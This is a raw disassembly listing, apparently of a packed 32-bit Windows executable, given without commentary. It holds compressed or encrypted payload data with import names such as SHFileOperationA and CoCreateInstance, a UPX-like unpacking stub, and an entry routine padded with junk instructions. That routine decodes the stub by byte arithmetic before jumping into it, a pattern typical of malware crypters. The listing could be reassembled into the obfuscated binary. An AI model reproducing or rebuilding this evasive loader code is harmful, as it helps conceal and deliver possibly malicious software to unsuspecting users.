dd 6C61243Fh, 61636F6Ch, 40726F74h, 40324044h, 30403040h
dd 1005A40h, 3F343F3Fh, 73616224h, 735F6369h, 6E697274h
dd 55444067h, 6863243Fh, 745F7261h, 74696172h, 40444073h
dd 40647473h, 243F5640h, 6F6C6C61h, 6F746163h, 40444072h
dd 73404032h, 40406474h, 41454151h, 31305641h, 44425040h
dd 5A40h, 17Ch, 1219Ch, 72747301h, 7970636Eh, 74610100h
dd 1006C6Fh, 656D6974h, 74610100h, 100696Fh, 7274735Fh
dd 6D63696Eh, 5F010070h, 64727473h, 1007075h, 73626D5Fh
dd 727075h, 72747301h, 746163h, 48455F01h, 6F72705Fh, 676F6Ch
dd 6D656D01h, 797063h, 706F6601h, 1006E65h, 6C6C616Dh
dd 100636Fh, 73727473h, 1007274h, 6F6C6366h, 1006573h
dd 65657266h, 5F5F0100h, 46787843h, 656D6172h, 646E6148h
dd 72656Ch, 78435F01h, 72685478h, 7845776Fh, 74706563h
dd 6E6F69h, 72707301h, 66746E69h, 656D0100h, 7465736Dh
dd 63770100h, 6E656C73h, 74660100h, 6C6C65h, 65736601h
dd 1006B65h, 70756F74h, 726570h, 72747301h, 6E656Ch, 72747301h
dd 797063h, 626D5F01h, 63626E73h, 1007970h, 73626D5Fh
dd 706D63h, 6C616301h, 636F6Ch, 72747301h, 706D63h, 746D6701h
dd 656D69h, 626D5F01h, 72747373h, 3F3F0100h, 70797431h
dd 6E695F65h, 40406F66h, 40454155h, 1005A58h, 6C645F5Fh
dd 656E6F6Ch, 746978h, 6E6F5F01h, 74697865h, 655F0100h
dd 746978h, 63585F01h, 69467470h, 7265746Ch, 78650100h
dd 1007469h, 65675F5Fh, 69616D74h, 6772616Eh, 5F010073h
dd 646D6361h, 1006E6Ch, 696E695Fh, 72657474h, 5F01006Dh
dd 7465735Fh, 72657375h, 6874616Dh, 727265h, 64615F01h
dd 7473756Ah, 6964665Fh, 5F010076h, 5F5F705Fh, 6D6D6F63h
dd 65646Fh, 705F5F01h, 6D665F5Fh, 65646Fh, 735F5F01h, 615F7465h
dd 745F7070h, 657079h, 78655F01h, 74706563h, 6E61685Fh
dd 72656C64h, 66010033h, 64616572h, 635F0100h, 72746E6Fh
dd 70666C6Fh, 1870000h, 22A40000h, 43010001h, 696E556Fh
dd 6974696Eh, 7A696C61h, 43010065h, 696E496Fh, 6C616974h
dd 657A69h, 436F4301h, 74616572h, 736E4965h, 636E6174h
dd 91000065h, 60000001h, 0FF000122h, 9FF000Ch, 8FF00h
dd 0FF0095FFh, 6FF0096h, 7FF00h, 0FF00C8FFh, 9E000002h
dd 88000001h, 1000122h, 69464853h, 704F656Ch, 74617265h
dd 416E6F69h, 1AA0000h, 22900000h, 45010001h, 6C617571h
dd 74636552h, 6F430100h, 65527970h, 1007463h, 72707377h
dd 66746E69h, 43010041h, 55726168h, 72657070h, 41h, 50000000h
dd 4C000045h, 0E1000401h, 4810E5h, 0
dd 0E0000000h, 0B010F00h, 601h, 120h, 0A0h, 0BA000000h
dd 117h, 10h, 130h, 4200h, 10h, 4000010h, 0
dd 4000000h, 2 dup(0)
dd 1D0h, 10h, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 48000000h, 0DC00015Eh, 0
dd 280001C0h, 3, 12h dup(0)
dd 0B4000130h, 2, 5 dup(0)
dd 2E000000h, 74786574h, 55000000h, 119h, 10h, 120h, 10h
dd 2 dup(0)
dd 20000000h, 2E600000h, 74616472h, 0A0000061h, 3Dh, 130h
dd 40h, 130h, 2 dup(0)
dd 40000000h, 2E400000h, 61746164h, 74000000h, 4Dh, 170h
dd 10h, 170h, 2 dup(0)
dd 40000000h, 2EC00000h, 63727372h, 28000000h, 3, 1C0h
dd 10h, 180h, 2 dup(0)
dd 40000000h, 400000h, 0D80001C0h, 161h, 1CB3B00h, 2073E100h
dd 12E7B321h, 6C8590CDh, 0FA4B2385h, 0B1606C09h, 6C1F4722h
dd 8F646C36h, 153F1DCBh, 1B2594DAh, 9341865h, 1685C1AEh
dd 2F5AF720h, 612A4201h, 0CC8DAF7Bh, 23A6A29Dh, 0EBDB007h
dd 6E6BAF6Eh, 6B9120BEh, 9AD65873h, 3526FAE3h, 135C4F33h
dd 207793B6h, 0C2437A1Bh, 37170EB4h, 1682093h, 0CB076345h
dd 0CD2B4646h, 0ED27AB2Bh, 8D1EC349h, 54556325h, 0B2501C03h
dd 2F2E2EE6h, 76347F5Ch, 7FE0733Fh, 7553AFA6h, 8E6363h
dd 0E5ADA243h, 6E6411DEh, 8AFB4527h, 2CDDB063h, 886870BAh
dd 1C6F4300h, 6D762E89h, 2F193963h, 0AC20BB6Fh, 77346C5h
dd 91076146h, 3747205Ah, 6F85D623h, 451BFD38h, 2B42BDF8h
dd 0AC9DD5B4h, 0ADB52220h, 5333869Dh, 58664F8Dh, 0A8AD6B5Eh
dd 0B61BE163h, 0B5AD1C99h, 2F531FC1h, 7DC4464Bh, 0D4CDC80Fh
dd 5A8BED39h, 9B46BDB1h, 0F8473425h, 59BA74ADh, 4CC6EFB2h
dd 0AB774161h, 7705C464h, 435477F6h, 203A459Eh, 0E182F4C1h
dd 673AF8A1h, 0E7AA6D75h, 0D92F7BAEh, 0FA2D851Bh, 0B85CCE64h
dd 29407B46h, 0C0B9EC59h, 93D759B6h, 0FF887925h, 0AED23764h
dd 21F5DAD0h, 65671C8Dh, 6E66C9FBh, 90660F1Bh, 0AD8D970Bh
dd 0AD2F61BDh, 3367FB54h, 0B4704386h, 3A575973h, 12191164h
dd 3572B236h, 0EDB5129Fh, 73710B70h, 6976445Ah, 0AD1E7342h
dd 235D9B2Dh, 951BF4B2h, 669A10DCh, 29CF566Fh, 85AE6169h
dd 0A4C3DBD0h, 61C223C3h, 9BE12C78h, 0BDC1C3FCh, 14E72043h
dd 0B57B7DCBh, 2DED6D18h, 692CB562h, 66F4399Ch, 6C08CE1Dh
dd 0D83473BBh, 876028E1h, 892F6472h, 836DE19Fh, 6B7C7301h
dd 610A4796h, 332DEE6h, 78182709h, 114EDA4Ah, 0D1063DAh
dd 0CD751409h, 799C8D1h, 644A5D8Ch, 0B098CE3Ah, 7B695767h
dd 7867AC63h, 793935AEh, 29E02C40h, 96B2C89h, 8777557Bh
dd 31B1BA24h, 0EE37223Ah, 0C06C2372h, 52475281h, 59DF3FEFh
dd 0ED0AA4C0h, 0DE97225Fh, 0C77FFFFh, 3D6000FFh, 548FDF0Bh
dd 658E101Bh, 2B2B0008h, 386B16D1h, 5F3719B0h, 38635F07h
dd 80C8A030h, 424A10h, 3205B494h, 6C288208h, 71044014h
dd 40023CB9h, 1201801h, 0E283AD43h, 419EDF41h, 4874040Ch
dd 3F017940h, 9780FBFBh, 74654701h, 7A695315h, 73614C0Ch
dd 1EC45574h, 370D7014h, 7763C513h, 92694474h, 0D8417913h
dd 5461B2DFh, 6F6D5911h, 22B71176h, 54534D9Eh, 62D17441h
dd 0D200B575h, 13732D6Dh, 0FF671047h, 8D84AF77h, 6D6E557Ah
dd 69567061h, 664F7765h, 0A02253A5h, 477D604Dh, 5D6BDE2Dh
dd 1046E6DBh, 0DD485721h, 76B0DB2Ch, 564C10FBh, 23246172h
dd 0C3664195h, 0E86141Ch, 7C51730Ch, 0DC5085FBh, 64644163h
dd 0A0250FB5h, 0B4C6D64h, 12FBEA4Eh, 6843DBC5h, 4D6F5441h
dd 79426953h, 61B91474h, 150A992Dh, 0B75B141Fh, 66A98584h
dd 67D27018h, 76D6C384h, 0E6736CA7h, 530B7459h, 25EDC26Ch
dd 737203F1h, 0DB500F0Bh, 654EFB0Dh, 539E0E78h, 2B36274h
dd 49B102C5h, 212F10A3h, 6F4DED08h, 5BAF8464h, 0E7B56954h
dd 7A6DBA16h, 7B443B44h, 2B23A00Ch, 531697B4h, 15946079h
dd 961D8C5h, 44FE02CFh, 4263238Ah, 83540E1Eh, 80A661E2h
dd 656F506Ah, 0DB78AA6Dh, 8506490Fh, 0C3866465h, 630AB6DCh
dd 0FE4A6D48h, 6602D24Dh, 0F878B05Bh, 0A0BA6E32h, 0B325B5F8h
dd 72CA2475h, 6CE80B6Dh, 9E1691F6h, 87635E44h, 434C1F19h
dd 8A794449h, 2423412Ch, 446A6139h, 0D6705565h, 79BD82EEh
dd 57090A46h, 60A66961h, 0C3378E62h, 4F3E7853h, 4F2B6A62h
dd 80931848h, 0D8F43D3Bh, 0D64D437Eh, 4154614Eh, 43B7401h
dd 5D3A17A3h, 31706517h, 42B34E36h, 6745004Dh, 50473AA0h
dd 79654BECh, 450BE70Ch, 0F75C8219h, 0E3530EEAh, 1360361Eh
dd 200B0F86h, 0D9A61B51h, 2257B586h, 0DFE85A57h, 0FFFB7F96h
dd 12FF1B10h, 0FF164E02h, 9EFF03ABh, 0B6305ADh, 0CB2F39FFh
dd 15C42FB7h, 211433FFh, 9A9CFF10h, 0F6FF021Ch, 5A96D965h
dd 175C0B20h, 19FF0959h, 0B37BBB05h, 337FBh, 21409F64h
dd 5F68733Fh, 66406473h, 2FDDED1h, 4040A090h, 16424832h
dd 6F5F7369h, 0EE80116Fh, 666940AAh, 425117E5h, 0AD6B545h
dd 5A5848EEh, 172A751Ah, 0B1B27FD3h, 69411280h, 41454129h
dd 0DB315641h, 40FDF8A8h, 48444150h, 63671E40h, 32074D8h
dd 4AD90C3Bh, 0EC631A63h, 41E47B00h, 5F3F5845h, 14301544h
dd 264591BBh, 502CA640h, 0F748FA42h, 79786Bh, 3F68E670h
dd 76243F31h, 0C558DB83h, 285FAB73h, 554440E9h, 5A19BB10h
dd 5F8D63D3h, 44CCFF0Eh, 54661840h, 40C35BB4h, 6E7D1556h
dd 0F115DBD9h, 16403213h, 0B219826Dh, 41476553h, 0B6311C42h
dd 5A5E8019h, 5F4044BAh, 5161619Bh, 0E7A3F59h, 8ED70549h
dd 665349B1h, 3E6C5FC3h, 0A94ACFCDh, 675966B2h, 87706E54h
dd 0FC0CCA27h, 4249324Ch, 0A31D874Bh, 30663492h, 15B05031h
dd 40057420h, 0D6554D9Eh, 4948DAD8h, 78A55C67h, 9161C731h
dd 11475494h, 0E54AADC3h, 2AB18F4Dh, 0D81255C1h, 9C63E764h
dd 59A238DAh, 534E5F41h, 43742040h, 0DC5A0130h, 0B93CD3BAh
dd 9C7CC9E8h, 0AD836E4Dh, 8B7066Bh, 74056C30h, 2BEDD999h
dd 69690BDFh, 706D706Eh, 5F4AD00Ah, 6D08A781h, 72DB0754h
dd 4F7B7093h, 0F5F7A10h, 5BE5B1AFh, 676F3Ah, 664A6D01h
dd 162E7243h, 2A880E73h, 47F41602h, 79EC5C2h, 435F5FDEh
dd 0CF467878h, 0B144C0CDh, 6E1120EBh, 54DB4458h, 0F4774C68h
dd 3AC5AE3Ch, 66ED5C68h, 5A703C5Ch, 77E0E701h, 45CF7363h
dd 0CEB55ED7h, 0E706E400h, 36956FB7h, 74ACD883h, 0B08E1E97h
dd 7B258D96h, 0CD0A626Eh, 0F7AF9863h, 670FC766h, 0A920F66Dh
dd 9759BDEh, 0AC559840h, 440B7BB1h, 0B93764AEh, 9C08F769h
dd 6258368h, 859D6358h, 9848B076h, 0B0675F12h, 2DBAD04h
dd 730D446Ah, 5E6C610Eh, 406B9CD7h, 271E569Ah, 0F6DF226Dh
dd 75D3EB44h, 5688E03h, 642572h, 6AD77BF4h, 64665F75h
dd 701F7669h, 10CCEC5Fh, 4B6DEAD4h, 0B10B660Dh, 393735B7h
dd 0A95FF42Ch, 84E11686h, 685F330Fh, 4B66334Ch, 0B9A14368h
dd 0A03F3E18h, 0D0A87066h, 8789D9B3h, 0DF6F22A4h, 931CFB0h
dd 490FF05Ch, 26D4110Dh, 6C133791h, 988B669Bh, 0FF609138h
dd 0B209020Ch, 8B2CB2Ch, 7069695h, 0CB6CD3E2h, 9E5C02C8h
dd 0D9485388h, 0CE786166h, 1A638E4Fh, 0E8F178AAh, 714590A7h
dd 20110975h, 5520B99Ch, 0B9E37709h, 0CCA3C743h, 34C855D0h
dd 0FB60A05Fh, 3455000h, 0E5E12B4Ch, 0FDB34810h, 0E0CE0583h
dd 0B010F00h, 20550601h, 59EE9A00h, 17BA13A0h, 3630100Bh
dd 742766EBh, 1E04030Bh, 0CDEE6707h, 27D0004Eh, 1024B200h
dd 606C9639h, 482F0607h, 1BE4025Eh, 0C050DC62h, 3280001h
dd 0B76C2BA1h, 1E02B4A7h, 0BD84BC2Eh, 0AF74AEC9h, 98EB1955h
dd 0BC368238h, 722E9212h, 83086CC1h, 0FB3D0635h, 57020340h
dd 40B9ACE8h, 6E00262Eh, 36536D4Bh, 27707048h, 36734FC0h
dd 122B98D8h, 27C0EB0Bh, 0FE004F80h, 0D81B56FDh, 0CB3B1761h
dd 1, 0
align 10h
loc_43E4B0: ; DATA XREF: start+102�o
pusha
mov esi, offset dword_436000
lea edi, [esi-15000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_43E4D2
; ---------------------------------------------------------------------------
align 8
loc_43E4C8: ; CODE XREF: HLXc:loc_43E4D9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_43E4CE: ; CODE XREF: HLXc:0043E566�j
; HLXc:0043E57D�j
add ebx, ebx
jnz short loc_43E4D9
loc_43E4D2: ; CODE XREF: HLXc:0043E4C0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_43E4D9: ; CODE XREF: HLXc:0043E4D0�j
jb short loc_43E4C8
mov eax, 1
loc_43E4E0: ; CODE XREF: HLXc:0043E4EF�j
; HLXc:0043E4FA�j
add ebx, ebx
jnz short loc_43E4EB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_43E4EB: ; CODE XREF: HLXc:0043E4E2�j
adc eax, eax
add ebx, ebx
jnb short loc_43E4E0
jnz short loc_43E4FC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_43E4E0
loc_43E4FC: ; CODE XREF: HLXc:0043E4F1�j
xor ecx, ecx
sub eax, 3
jb short loc_43E510
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_43E582
mov ebp, eax
loc_43E510: ; CODE XREF: HLXc:0043E501�j
add ebx, ebx
jnz short loc_43E51B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_43E51B: ; CODE XREF: HLXc:0043E512�j
adc ecx, ecx
add ebx, ebx
jnz short loc_43E528
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_43E528: ; CODE XREF: HLXc:0043E51F�j
adc ecx, ecx
jnz short loc_43E54C
inc ecx
loc_43E52D: ; CODE XREF: HLXc:0043E53C�j
; HLXc:0043E547�j
add ebx, ebx
jnz short loc_43E538
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_43E538: ; CODE XREF: HLXc:0043E52F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_43E52D
jnz short loc_43E549
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_43E52D
loc_43E549: ; CODE XREF: HLXc:0043E53E�j
add ecx, 2
loc_43E54C: ; CODE XREF: HLXc:0043E52A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_43E56C
loc_43E55D: ; CODE XREF: HLXc:0043E564�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_43E55D
jmp loc_43E4CE
; ---------------------------------------------------------------------------
align 4
loc_43E56C: ; CODE XREF: HLXc:0043E55B�j
; HLXc:0043E579�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_43E56C
add edi, ecx
jmp loc_43E4CE
; ---------------------------------------------------------------------------
loc_43E582: ; CODE XREF: HLXc:0043E50C�j
pop esi
mov edi, esi
mov ecx, 75Bh
loc_43E58A: ; CODE XREF: HLXc:0043E591�j
; HLXc:0043E596�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_43E58F: ; CODE XREF: HLXc:0043E5B4�j
cmp al, 1
ja short loc_43E58A
cmp byte ptr [edi], 6
jnz short loc_43E58A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_43E58F
lea edi, [esi+1C000h]
loc_43E5BC: ; CODE XREF: HLXc:0043E5DE�j
mov eax, [edi]
or eax, eax
jz short loc_43E607
mov ebx, [edi+4]
lea eax, [eax+esi+1E324h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+1E400h]
xchg eax, ebp
loc_43E5D9: ; CODE XREF: HLXc:0043E5FF�j
mov al, [edi]
inc edi
or al, al
jz short loc_43E5BC
mov ecx, edi
jns short near ptr loc_43E5EA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_43E5EA: ; CODE XREF: HLXc:0043E5E2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+1E404h]
or eax, eax
jz short loc_43E601
mov [ebx], eax
add ebx, 4
jmp short loc_43E5D9
; ---------------------------------------------------------------------------
loc_43E601: ; CODE XREF: HLXc:0043E5F8�j
call dword ptr [esi+1E414h]
loc_43E607: ; CODE XREF: HLXc:0043E5C0�j
mov ebp, [esi+1E408h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+20Fh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp-80h]
loc_43E63B: ; CODE XREF: HLXc:0043E63F�j
push 0
cmp esp, eax
jnz short loc_43E63B
sub esp, 0FFFFFF80h
jmp loc_4317BA
; ---------------------------------------------------------------------------
align 4
dd 8 dup(0)
db 0
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
mov ah, 5Bh
test ah, bh
and ecx, edi
rcl esi, 35h
adc esi, 0CEA7B405h
bts ecx, 44h
lea edi, ds:0EE47D4A5h
bswap ecx
lea edi, ds:0EE7F445h
db 2Eh
shld edi, esi, 0E5h
shld edi, esi, cl
jmp short loc_43E69A
; ---------------------------------------------------------------------------
db 73h
; ---------------------------------------------------------------------------
loc_43E69A: ; CODE XREF: start+2A�j
jmp short loc_43E69D
; ---------------------------------------------------------------------------
inc ecx
loc_43E69D: ; CODE XREF: start:loc_43E69A�j
test dl, ch
db 64h
rep xor eax, 0B25B7819h
bsr ebp, edi
bsf ebx, edx
bts ecx, 24h
shld edi, esi, 5
lea edi, ds:0DEF744D5h
mov ecx, edi
adc eax, 0FE976475h
movzx ecx, di
mov esi, ebp
rep test ebp, 5A23E0A1h
rep shld ebx, edx, cl
xchg ecx, eax
xadd ecx, esi
lea ebp, ds:2CDDA20Bh
adc esi, 168FBCADh
shl ecx, 4Ch
test eax, 362FDC4Dh
test ebx, edx
inc edi
imul ebp, edi
inc ebx
jmp short loc_43E6F6
; ---------------------------------------------------------------------------
db 64h
; ---------------------------------------------------------------------------
loc_43E6F6: ; CODE XREF: start+86�j
not esi
bt ebp, edi
lea ebx, ds:4AD350D1h
db 65h
mov ebx, 6A737071h
neg ah
xor eax, 8A139011h
xadd bh, ah
btc ebx, 0B1h
shrd eax, ebx, cl
inc esi
db 26h
imul ebx, edx, 0E24B2889h
sbb ah, 9Bh
mov dl, al
jmp short loc_43E729
; ---------------------------------------------------------------------------
db 0D4h
; ---------------------------------------------------------------------------
loc_43E729: ; CODE XREF: start+B9�j
db 64h
neg ah
bsf ebx, edx
bsf ecx, eax
mov esi, 0B6AF5CCDh
sub esp, 4
mov [esp+4+var_4], edx
pop ecx
mov edx, 0C4h
push edx
push eax
mov eax, 11h
push eax
add ebx, [esp+0Ch+var_C]
pop eax
pop eax
sub ebx, 11h
pop ecx
push eax
mov eax, 11h
push eax
add ebx, [esp+8+var_8]
pop eax
pop eax
push ecx
sub ecx, ecx
mov ecx, 11h
loc_43E769: ; CODE XREF: start+FF�j
sub ebx, 1
loop loc_43E769
pop ecx
mov edi, offset loc_43E4B0
push ecx
sub ecx, ecx
mov ecx, 11h
loc_43E77C: ; CODE XREF: start+112�j
add ebx, 1
loop loc_43E77C
pop ecx
sub ebx, 11h
sub esp, 4
mov [esp+4+var_4], edi
push eax
mov eax, 11h
push eax
add ebx, [esp+0Ch+var_C]
pop eax
pop eax
sub ebx, 11h
loc_43E79A: ; CODE XREF: start+162�j
add byte ptr [edi], 0DBh
push eax
mov eax, 11h
push eax
add ebx, [esp+0Ch+var_C]
pop eax
pop eax
push ecx
sub ecx, ecx
mov ecx, 11h
loc_43E7B1: ; CODE XREF: start+147�j
sub ebx, 1
loop loc_43E7B1
pop ecx
add edi, 2
push ecx
sub ecx, ecx
mov ecx, 11h
loc_43E7C2: ; CODE XREF: start+158�j
add ebx, 1
loop loc_43E7C2
pop ecx
sub ebx, 11h
sub ecx, 1
dec ecx
jnz short loc_43E79A
push ebx
push ecx
sub ecx, ecx
mov ecx, 11h
loc_43E7DA: ; CODE XREF: start+170�j
add ebx, 1
loop loc_43E7DA
pop ecx
push ecx
sub ecx, ecx
mov ecx, 11h
loc_43E7E8: ; CODE XREF: start+17E�j
sub ebx, 1
loop loc_43E7E8
pop ecx
pop ecx
retn
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
HLXc ends
; Section 4. (virtual address 00020000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00020000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 440000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start